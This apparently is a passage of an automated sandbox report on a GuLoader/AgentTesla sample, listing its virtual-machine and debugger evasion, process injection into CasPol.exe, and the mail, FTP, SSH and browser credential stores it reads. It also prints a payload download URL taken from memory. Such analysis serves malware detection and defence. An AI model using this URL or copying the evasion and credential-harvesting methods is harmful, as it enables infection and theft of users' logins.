            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_00407F27 push edi; ret
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_00407FBA push eax; iretd
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF0EAD push ebx; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF40BE push ecx; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF3E8C push edx; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF4486 push esp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF4486 push FFFFFFCFh; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF3AE8 push eax; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF44E8 push FFFFFFCFh; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF18FB push eax; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF122F push ebp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF1409 push es; ret
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF0C19 push B6F4B489h; ret
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF3C4F push esp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF2BA7 push ebp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF4BBE push eax; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF4987 push esp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF3F9D push edx; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF319C push eax; ret
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF3B98 push edx; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF4793 push eax; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF21E2 push ecx; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF0FE0 push esp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF29CA push edx; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.15645216813
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\pago12_14299038859.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\pago12_14299038859.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmp, pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1RVZMBX5UH5TLF4YLXHMC756C1SKQ0VOB
            Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4252Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9956
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\pago12_14299038859.exeSystem information queried: ModuleInformation
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWN
            Source: pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmp, pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\pago12_14299038859.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01249938 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\pago12_14299038859.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1300000
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago12_14299038859.exe"
            Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5004, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5004, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5004, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1Input Capture21System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSecurity Software Discovery421Distributed Component Object ModelInput Capture21Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion341Cached Domain CredentialsVirtualization/Sandbox Evasion341VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            pago12_14299038859.exe16%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
